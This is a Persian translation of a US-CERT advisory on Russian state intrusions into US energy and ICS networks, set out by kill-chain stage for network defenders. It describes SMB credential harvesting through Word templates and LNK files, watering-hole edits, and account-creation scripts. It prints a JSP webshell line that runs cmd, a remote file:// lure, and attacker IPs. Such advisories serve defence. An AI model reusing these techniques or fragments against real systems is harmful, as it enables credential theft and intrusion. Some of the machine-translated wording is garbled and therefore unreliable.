مقدمه
هشدار فنی مشترک (TA) نتیجه تلاشهای تحلیلی بین وزارت امنیت داخلی و اداره تحقیقات فدرال است. این هشدار اطلاعاتی را درباره اقدامات دولت روسیه در جهت هدف قرار دادن نهادهای دولتی ایالات متحده و همچنین سازمانهای انرژی، هسته ای، تاسیسات تجاری، آب، هوایی و بخشهای تولید بحرانی ارائه میدهد. همچنین شامل شاخصهای سازش (IOCs) و جزئیات فنی در مورد تاکتیک ها، تکنیک ها و رویه ها (TTP ها) است که توسط نیروهای سایبری دولت روسیه در شبکههای قربانیان آسیب دیده استفاده میشود. DHS و FBI این هشدار را برای آموزش مدافعان شبکه به منظور افزایش توانایی آنها برای شناسایی و کاهش قرار گرفتن در معرض فعالیتهای مخرب ایجاد کردند.
DHS و FBI این فعالیت را به عنوان یک برنامه نفوذ چند مرحله ای توسط نیروهای سایبری دولتی روسیه که شبکههای کنترل صنعتی را هدف قرار داده اند و بوسیله قرار دادن تروجان، حمله فیشینگ را اجرا کردند و دسترسی از راه دور به شبکههای بخش انرژی را به دست آوردند. پس از به دست آوردن دسترسی، نیروهای سایبر دولتی روسیه شبکههای سایبری و صنعتی را پویش نموده و اطلاعات لازم را جمع آوری کردند. در ادامه مسیر را برای گسترش سطح دسترسی هموار نموده و این عمل را در شبکههای ICS انجام دادند.
حداقل از سال 2016 تاکنون ، نیروهای سایبری دولت روسیه، بعدها به عنوان "نیروهای امنیت سایبری دولتی" شناخته میشدند موسسات دولتی و چندین زیربنای زیربناهای مهم ایالات متحده از جمله انرژی، تاسیسات هسته ای، تجاری، آب، هواپیما و بخشهای مهم تولید را هدف قرار دادهاند. تجزیه و تحلیل توسط DHS و FBI، منجر به شناسایی شاخصهای مشخص و رفتار مربوط به این فعالیت است. توجه داشته باشید، گزارش Dragonfly: بخش انرژی غربی توسط گروه حمله پیچیده که توسط سیمانتک در تاریخ 6 سپتامبر 2017 منتشر شد، اطلاعات بیشتری در مورد این کمپین مداوم ارائه میدهد. این مبارزات شامل دو دسته مجزا از قربانیان است: شناسایی اهداف جدید، حمله به اهداف تعیین شده. قربانیان اولیه سازمانهای محرمانهای مانند تامین کنندگان ثالث قابل اعتماد با شبکههای امنتر هستند که در این هشدار به عنوان "اهداف تعیین شده" اشاره شده است. نیروهای امنیت سایبری دولتی استفاده از شبکههای اهداف تعیین شده را به عنوان نقاط محوری هنگام هدف گیری قربانیان نهایی خود قرار داده اند. NCCIC و FBI با توجه به رفتار آنها اینطور تحلیل میکنند که هدف نهایی نیروهای این است که به شبکههای سازمانی آسیب برسانند، همچنین به عنوان "هدف مورد نظر" اشاره شده است.
جزییات فنی
نیروهای امنیت سایبری دولتی تهدید کننده در این کمپین انواع مختلفی از TTP (تاکنیک، تکنیک و روشها)را پیادهسازی مینمودند:
استفاده از زنجیره حملههای سایبری برای تجزیه و تحلیل
مجموعه ICSdefender برای تحلیل رفتار این حملات از مدل زنجیره حملاتی که توسط Lockheed-Martin طراحی شده، استفاده میکند. فازهای این مدل شامل شناسایی، مسلح کردن، تحویل، بهره برداری، نصب، فرمان و کنترل و اقدامات مربوط به هدف است.
مرحله یک: شناسایی
به نظر میرسد نیروهای امنیت سایبری دولتی به طور آگاهانه سازمانهایی را که مورد هدف قرار میگیرند انتخاب کرده اند. اهداف مرحله بندی روابط پیشین را با بسیاری از اهداف مورد نظر برقرار کرد. مجموعه ICSdefender بر این باور است که تجزیه و تحلیل و شناسایی نیروهای امنیت سایبری دولتی دسترسی به اطلاعات عمومیدر دسترس میزبانی شده توسط شبکههای تحت نظارت سازمان در طول مرحله شناسایی حتما انجام شده و میتوان گفت با این حرکت اولین مرحله از مدل زنجیره حملات را پیادهسازی نمودهاند. و البته آنها با استفاده از این شناسایی به دنبال اطلاعات و قابلیتهای مربوط به شبکه و زیرساخت سیستمهای کنترل صنعتی سازمانهای مورد هدف میباشند. این تاکتیک ها معمولا برای جمع آوری اطلاعات مورد نیاز برای حملات هدفمند فیشینگ استفاده میشود. در برخی موارد، اطلاعات ارسال شده به وب سایتهای شرکت، به ویژه اطلاعاتی که ممکن است به نظر بی خطر باشند، ممکن است حاوی اطلاعات عملیاتی حساس باشد. به عنوان مثال، نیروهای امنیت سایبری دولتی یک عکس کوچک از یک صفحه منابع انسانی قابل دسترسی را دریافت کردند. تصویر، مورد نظر با اعمال تغییرات در کیفیت و کمیت، یک عکس با وضوح بالا بود که مدلهای تجهیزات کنترل سیستم ها و اطلاعات وضعیت در پس زمینه را نشان داده است.
مرحله دو: مسلح کردن
ایمیل TTPهای ایمیل فیشینگ
طبق تحلیل ICSdefender با توجه به بررسیهای انجام شده، در فاصله زمانی حملات فیشینگ، نیروهای امنیت سایبری دولتی از ضمیمههای ایمیل برای استفاده از توابع مشروع مایکروسافت آفیس برای بازیابی یک سند از یک سرور از راه دور با استفاده از پروتکل پیام سرور بلوک (SMB) استفاده کردند. (یک مثال از این درخواست است: فایل [::] // <آدرس IP راه دور> /Normal.dotm). به عنوان بخشی از فرایندهای استاندارد انجام شده توسط Microsoft Word، این درخواست مشتری را با سرور تایید میکند، هشدار اعتبار کاربر را به سرور راه دور قبل از بازیابی فایل درخواست شده ارسال میکند. (توجه داشته باشید: انتقال اعتبارات ممکن است، حتی اگر فایل بازیابی نگردد.) پس از به دست آوردن هش اعتبار، نیروهای امنیت سایبری دولتی میتوانند از تکنیکهای رمز گشایی رمز عبور برای به دست آوردن رمز عبور استفاده کنند. با داشتن این رابطه معتبر، نیروهای امنیت سایبری دولتی میتوانند به عنوان کاربران مجاز در محیطهایی که از احراز هویت تک فاکتور استفاده میکنند، پنهان شوند.
استفاده از Watering Hole Domains
یکی از تهدیدات اصلی نیروهای برای رسیدن به اهداف، توسعه watering holes بود. نیروهای امنیت سایبری دولتی، زیرساختهای سازمانهای مورد اعتماد را برای دستیابی به اهداف مورد نظر به خطر میاندازند. [3] تقریبا نیمیاز watering holesهای شناخته شده، نشریات تجاری و وب سایتهای اطلاعاتی مرتبط با کنترل فرایند، ICS یا زیرساختهای حیاتی هستند. اگر چه این watering holes ها ممکن است محتوی قانونی ایجاد شده توسط سازمانهای معتبر را نمایش دهند، اما نیروهای امنیت سایبری دولتی تغییرات لازم را در وب سایت ها مدنظر برای انتشار محتوای مخرب ایجاد نمودهاند. نیروهای امنیت سایبری دولتی از اعتبارنامههای قانونی برای دسترسی به محتوای وب سایت و تغییر آن به طور مستقیم استفاده میکنند. نیروهای امنیت سایبری دولتی این وب سایت ها را با تغییر دادن فایلهای جاوا اسکریپت و پی اچ پی برای درخواست یک نماد فایل با استفاده از SMB از یک آدرس IP تحت کنترل نیروهای امنیت سایبری دولتی اصلاح کردند. این درخواست یک تکنیک مشابهی را که در اسناد اسکریپت فیشینگ برای برداشت اعتبار انجام میدهد. در یک نمونه، نیروهای امنیت سایبری دولتی یک خط کد را در فایل "header.php"، یک فایل پی اچ پی قانونی که ترافیک هدایت شده را انجام داد، اضافه کرد.
در مثال دیگری، نیروهای امنیت سایبری دولتی، فایل جاوا اسکریپت "modernizr.js"، یک کتابخانه ی جاوا اسکریپت قانونی مورد استفاده در وب سایت را برای شناسایی جنبههای مختلف مرورگر کاربر مورد نظر، تغییر دادند. در واقع پرونده برای مطالبی که از اینجا میتوانید دانلود کنید، اصلاح شد:
مرحله سه: تحویل
نیروهای امنیت سایبری دولتی برای حمله به شبکه مورد نظر از ایمیلهای فیشینگ استفاده میکنند که از TTPهای قبلا گزارش شده متفاوت است. ایمیلهای قطعی فیسبوک از یک موضوع قرارداد عمومی(با موضوع "موافقتنامه و محرمانه") استفاده کرده و حاوی یک اسناد PDF عمومیبا عنوان "document.pdf" است. (توجه داشته باشید که در ابتدای نام دلخواه دو عدد پشتی قرار داده میشود.) PDF ناقص بود و هیچ کد فعال نبود. این سند شامل یک URL کوتاه شده بود که وقتی روی آن کلیک کرد، کاربران را به یک وب سایت هدایت کرد که کاربر را برای آدرس ایمیل و رمز عبور راهنمایی کرد. (توجه: کد موجود در PDF یک دانلود را آغاز نمیکند.)
در گزارش قبلی، DHS و FBI اشاره کردند که تمام این ایمیلهای فیسبوک صریح به سیستمهای کنترل یا سیستمهای کنترل فرآیند اشاره دارند. نیروهای امنیت سایبری دولتی با استفاده از این تم ها به طور خاص به سازمانهای هدف مورد نظر ادامه دادند. پیامهای ایمیل حاوی مراجع به تجهیزات و پروتکلهای صنعتی کنترل صنعتی بود. این ایمیل ها از فایلهای مخرب مایکروسافت ورد استفاده میکنند که به نظر میرسد رزومههای قانونی یا CV ها (CVs) برای پرسنل سیستمهای کنترل صنعتی و دعوت نامه ها و اسناد سیاست ای است که کاربر را مجبور به باز کردن پیوست میکند.
مرحله چهار: بهرهبرداری
نیروهای امنیت سایبری دولتی از TTP متمایز و غیر معمول استفاده میکنند (به عنوان مثال، هدایتهای متوالی) بطوری که با استفاده از تکنیک فیشینگ و تاکتیک هدایتهای متوالی تغییرات مورد نظر را در هدف اعمال میکنند. ایمیل ها شامل یک پیوند کوتاه شده URL که کاربر را به لینک http: // bit [.] ly / 2m0x8IH هدایت کرده، و در ادامه آن را به لینک http: // tinyurl [.] com / h3sdqck هدایت میکند، و در نهایت کاربر را به سمت مقصد نهایی http: // imageliners [.] com / nitel هدایت میکند. وب سایت imageliner [.] com حاوی یک آدرس ایمیل و زمینه ورودی رمز عبور است که یک صفحه ورود به سایت را برای یک وب سایت شبیه سازی میکند.
هنگام استفاده قطعه کد مخرب به منظور بهرهبرداری از اهداف قبلا تعیین شده، نیروهای امنیت سایبری دولتی از فایلهای مخرب docx برای تصویربرداری از مجوزهای کاربری استفاده کردند. فایلهای محتوای اسناد تلاش میکنند فایل را با اتصال "file: \\" از طریق SMB با استفاده از پورت 445 یا 139 پروتکل (TCP) و پورت 137 یا 138 پروتکل (UDP) بازیابی کنند. این اتصال به یک فرمان و کنترل (C2) سرور - یا یک سرور متعلق به نیروهای امنیت سایبری دولتی و یا یک سیستم دسترسی گرفته شده متعلق به یک قربانی متصل خواهد شد. هنگامیکه یک کاربر به عنوان یک کاربر دامنه تأیید میشود، این سرور C2 با Hash قربانی را ارائه میدهد. کاربران محلی یک واسط کاربری گرافیکی (GUI) را برای وارد کردن نام کاربری و رمز عبور دریافت خواهند کرد. (توجه داشته باشید: انتقال فایل برای از بین بردن اطلاعات اعتبار ضروری نیست.) گزارش سیمانتک این رفتار را به نیروهای امنیت سایبری دولتی در حملاتDragonfly مرتبط میداند.
مرحله پنجم: نصب
نیروهای امنیت سایبری دولتی از اعتبار نامههای آسیب پذیر برای دسترسی به شبکههای قربانیان که در آن احراز هویت چند عامل وجود ندارد، مورد استفاده قرار میدهند و همچنین برای حفظ ماندگاری، نیروهای امنیت سایبری دولتی حسابهای محلی را در حوضههای تعیین شده ایجاد کردند و فایلهای مخرب را در اهداف مورد نظر قرار دادند.
ایجاد حسابهای محلی
نیروهای امنیت سایبری دولتی از اسکریپت ها برای ایجاد حسابهای سرپرست محلی را که به عنوان حسابهای پشتیبان قانونی مبدل شده اند استفاده میکنند. در واقع اسکریپت اولیه "symantec_help.jsp" حاوی رهنمود یک خط برای یک اسکریپت مخرب طراحی شده برای ایجاد حساب کاربری محلی و مدیریت فایروال برای دسترسی از راه دور است. این اسکریپت در "C: \ Program Files (x86) \ Symantec \ Symantec Endpoint Protection Manager \ tomcat \ webapps \ ROOT \" قرار گرفته است.
محتویات symantec_help.jsp را از اینجا میتوانید دانلود کنید.
<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\\""); %>
اسکریپت "enu.cmd" یک حساب کاربری ایجاد کرده، فایروال مبتنی بر میزبان را غیرفعال کرده است، و پورت 3389 را برای دسترسی به پروتکل دسک تاپ (RDP) باز کرده است. این اسکریپت پس از آن تلاش کرد که حساب جدید ایجاد شده را به گروه مدیران اضافه کند تا امتیازات بالاتری به دست آورد. این اسکریپت دارای مقادیر سخت افزاری برای نام گروه "administrator" در اسپانیایی، ایتالیایی، آلمانی، فرانسوی و انگلیسی است.
محتویات end.cmd را از اینجا میتوانید دانلود کنید.
نیروهای امنیت سایبری دولتی با استفاده از این اسکریپت و اسکریپتهای مشابه برای ایجاد چندین حساب در شبکههای هدف استفاده میکردند. هر حساب ایجاد شده توسط نیروهای امنیت سایبری دولتی به هدف خاصی در عملیات خود خدمت کرده است. این اهداف از ایجاد حسابهای اضافی تا پاکسازی فعالیت ها متغیر بود. با توجه به بررسیهای انجام شده، نیروهای امنیت سایبری دولتی اقدامات زیر را بعد از ایجاد این حسابهای محلی انجام دادند:
فعالیتهای برنامه ریزی شده
علاوه بر این، نیروهای امنیت سایبری دولتی یک کار برنامه ریزی شده با نام reset ایجاد کردند که برای هر بار هشت ساعت به طور خودکار از حساب کاربری تازه ایجاد شده خود خارج شد.
نرم افزار VPN
پس از دستیابی به اهداف تعیین شده، نیروهای امنیت سایبری دولتی ابزارهایی را برای انجام عملیات علیه قربانیان منتخب نصب کردند. در یک مورد، نیروهای امنیت سایبری دولتی نسخه رایگان FortiClient را نصب کردند، که احتمالا به عنوان یک مشتری VPN برای اتصال به شبکههای هدف مورد استفاده قرار میگیرند.
دانلودر
هنگامیکه در داخل یک شبکه هدف مورد نظر قرار گرفت، تهدید کننده اقدام به دانلود ابزار از یک سرور از راه دور کرد. نسخههای اولیه نام فایل شامل افزونههای .txt بود و به پسوند مناسب، معمولا .exe یا .zip تغییر نام یافت. در یک مثال، پس از دستیابی به دسترسی از راه دور به شبکه قربانی مورد نظر، شخص تهدید اقدامات زیر را انجام داد:
دستکاری مستمر از طریق فایل .LNK
نیروهای امنیت سایبری دولتی شده فایلهای LNK را، که معمولا به عنوان یک فایل میانبر مایکروسافت شناخته میشوند، دستکاری میکنند تا بارها جمع آوری اعتبار کاربر را انجام دهند. قابلیت پیش فرض ویندوز آیکون ها را میتوان از یک مخزن ویندوز محلی یا راه دور بارگیری کرد. نیروهای امنیت سایبری دولتی با استفاده از این قابلیت ساخته شده در ویندوز با تنظیم مسیر آیکون به کنترلر سرور راه دور توسط نیروهای. هنگامیکه کاربر به دایرکتوری میرود، ویندوز تلاش میکند تا آیکون را بارگذاری و یک جلسه تأیید هویت SMB را آغاز کند. در طول این فرآیند، اعتبار فعال کاربر از طریق اتصال SMB انجام میشود.
چهار فایل LNK مشاهده شده "SETROUTE.lnk"، "notepad.exe.lnk"، "Document.lnk" و "desktop.ini.lnk" بودند. این نامها به نظر میرسد متنی هستند و هکر دولتی میتواند از چندین نام فایل دیگر در هنگام استفاده از این تاکتیک استفاده کند. دو سرور از راه دور در مسیر آیکون این پروندههای LNK مشاهده شد: 62.8.193 [.] 206 و 5.153.58 [.] 45. در زیر محتوای تجزیه شده یکی از فایلهای LNK را مشاهده میکنید:
مرحله شش: فرماندهی و کنترل
نیروهای امنیت سایبری دولتی به طور معمول پوستههای وب را بر روی اهداف مورد نظر 'ایمیل ها و سرورهای وب قابل دسترسی در دسترس قرار میدهند. نیروهای امنیت سایبری دولتی از دو نام مختلف فایل ("global.aspx"، "autodiscover.aspx" و "index.aspx") برای دو Webshell مختلف استفاده میکنند. تفاوت بین دو گروه "میدان رمز عبور عمومی" بود. محتوای این بخش نیز در سند PDF قابل مشاهده میباشد.
مرحله هفتم: اقدامات در اهداف
FBI نیروهای امنیت سایبری دولتی را بواسطه استفاده از خدمات دسترسی از راه دور و زیرساختهای مانند VPN، RDP و Outlook Web Access (OWA) شناسایی کردند. نیروهای امنیت سایبری دولتی از زیرساخت هدف، برای اتصال به چند هدف دیگر مورد استفاده میکنند.
شناسایی داخلی
پس از دسترسی به قربانیان مورد نظر، نیروهای امنیت سایبری دولتی عملیات شناسایی را در داخل شبکه انجام دادند. هنگامیکه در شبکه هدف مورد نظر قرار میگیرد، نیروهای امنیت سایبری دولتی از اعتبار دسترسیهای ویژه برای دسترسی به کنترل کننده دامنه قربانی به طور معمول از طریق RDP استفاده میکنند. هنگامیکه در کنترل کننده دامنه بود، نیروهای امنیت سایبری دولتی از اسکریپتهای دسته ای "dc.bat" و "dit.bat" برای شمارش میزبان، کاربران و اطلاعات اضافی در مورد محیط استفاده کردند. خروجیهای مشاهده شده (اسناد متنی) از این اسکریپتها عبارت بودند از:
امنیت سایبری دولتی همچنین فایلهای "ntds.dit" و "SYSTEM" را ثبت کردند. همچنین طی بررسیهای انجام شده مشخص شد، امنیت سایبری دولتی تمام این فایلهای مذکور را به فایل با نام "SYSTEM.zip" و "comps.zip" فشرده کردهاند. امنیت سایبری دولتی از وظایف برنامه ریزی شده ویندوز و اسکریپتهای دسته ای برای اجرای "scr.exe" استفاده کرده و اطلاعات اضافی را از میزبان ها در شبکه جمع آوری میکنند. ابزار "scr.exe" یک ابزار تصویری است که شخص تهدید برای تصویر برداری از سیستم در سراسر شبکه استفاده میکند. در حداقل دو مورد، امنیت سایبری دولتی استفاده از اسکریپتهای دسته ای با برچسب pss.bat و psc.bat را برای اجرای ابزار Psexec استفاده میکنند. علاوه بر این، امنیت سایبری دولتی میتوانند Psexec ابزار را به "ps.exe" تغییر نام دهند.
طی بررسیهای انجام شده مشخص شد نیروهای امنیت سایبری دولتی یک سند متن با برچسب "ip.txt" که معتقد است حاوی یک لیست از اطلاعات میزبان است ایجاد و اصلاح کردهاند. نیروهای امنیت سایبری دولتی "ip.txt" را به عنوان منبع میزبان برای انجام اقدامات شناسایی بیشتر مورد استفاده قرار دادند. علاوه بر این، اسناد متنی "res.txt" و "err.txt" مشاهده شده در نتیجه اسکریپتهای دسته ای که اجرا میشوند ایجاد میشوند. در یک نمونه، "res.txt" حاوی خروجی از فرمان ویندوز "کاربر پرس و جو" در سراسر شبکه بود.
Using
Running -s cmd /c query user on
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
2 Disc 1+19:34 6/27/2017 12:35 PM
یک اسکریپت با نام "dirsb.bat" برای جمع آوری نام پوشه ها و فایل ها از میزبان ها در شبکه استفاده شد.
علاوه بر اسکریپتهای مذکور، نیروهای امنیت سایبری دولتی همچنین از وظایف برنامه ریزی شده برای جمع آوری تصاویر با "scr.exe" استفاده میکنند. در دو مورد، وظایف برنامه ریزی شده برای اجرای دستور "C: \ Windows \ Temp \ scr.exe" با استدلال "C: \ Windows \ Temp \ scr.jpg" طراحی شده بود. در مثال دیگری، کار برنامه ریزی شده برای اجرا با استدلال "pss.bat" از پوشه محلی Administrator محلی "AppData \ Local \ Microsoft \" طراحی شده است. نیروهای امنیت سایبری دولتی معمولا از فایلهای دایرکتوریهای مختلف در پوشه AppData یا Downloads استفاده میکنند. برخی از نامهای دایرکتوری مشترک در داخل سند قابل مشاهده هستند. لطفا آن را از اینجا دانلود کنید.
هدف قرار دادن زیرساختهای ICS و SCADA
در موارد متعدد، نیروهای امنیت سایبری دولتی به ایستگاههای کاری و سرورها در یک شبکه شرکتی دسترسی پیدا کردند که خروجی داده ها را از سیستمهای کنترل درون بخش صنعتی و انرژی تولید میکرد. نیروهای امنیت سایبری دولتی به فایلهای مربوط به ICS یا کنترلهای نظارت و جمع آوری داده ها (SCADA) دسترسی پیدا میکنند. بر اساس تجزیه و تحلیل ما از روشهای موجود، این پرونده ها با نامهای فروشنده ICS و اسناد مرجع ICS مربوط به سازمان نامگذاری شدهاند (به عنوان مثال، "SCADA CIRING DIAGRAM.pdf" یا "SCADA PANEL LAYOUTS.xlsx").
امضای شبکه و قوانین مبتنی بر میزبان
این بخش شامل امضاهای شبکه و قوانین مبتنی بر میزبان است که میتواند مورد استفاده برای شناسایی فعالیتهای مخرب مرتبط با TTPهای تهدید کننده عمل کند. اگر چه این امضاهای شبکه و قوانین مبتنی بر میزبان با استفاده از یک فرایند جامع ارزیابی ایجاد شد، احتمال وجود مثبت کاذب همیشه باقی میماند.
امضاهای شبکه
این بخش نیز در سندی که لینک دانلود آن در انتهای این صفحه درج شده، موجود است.
قوانین YARA
این یک قانون تلفیقی برای بدافزارهای مرتبط با این فعالیت است. این قوانین توسط NCCIC نوشته شده که در سند PDF قابل مشاهده است.
مطلب فوق و قطعه کدهای مورد نظر را میتوانید از اینجا دانلود کنید.
کد: 50014866
زمان انتشار: شنبه 18 فروردین 1397 07:30 ب.ظ
منبع: us-cert
تعداد نمایش: 88
ما را در شبکه های اجتماعی دنبال کنید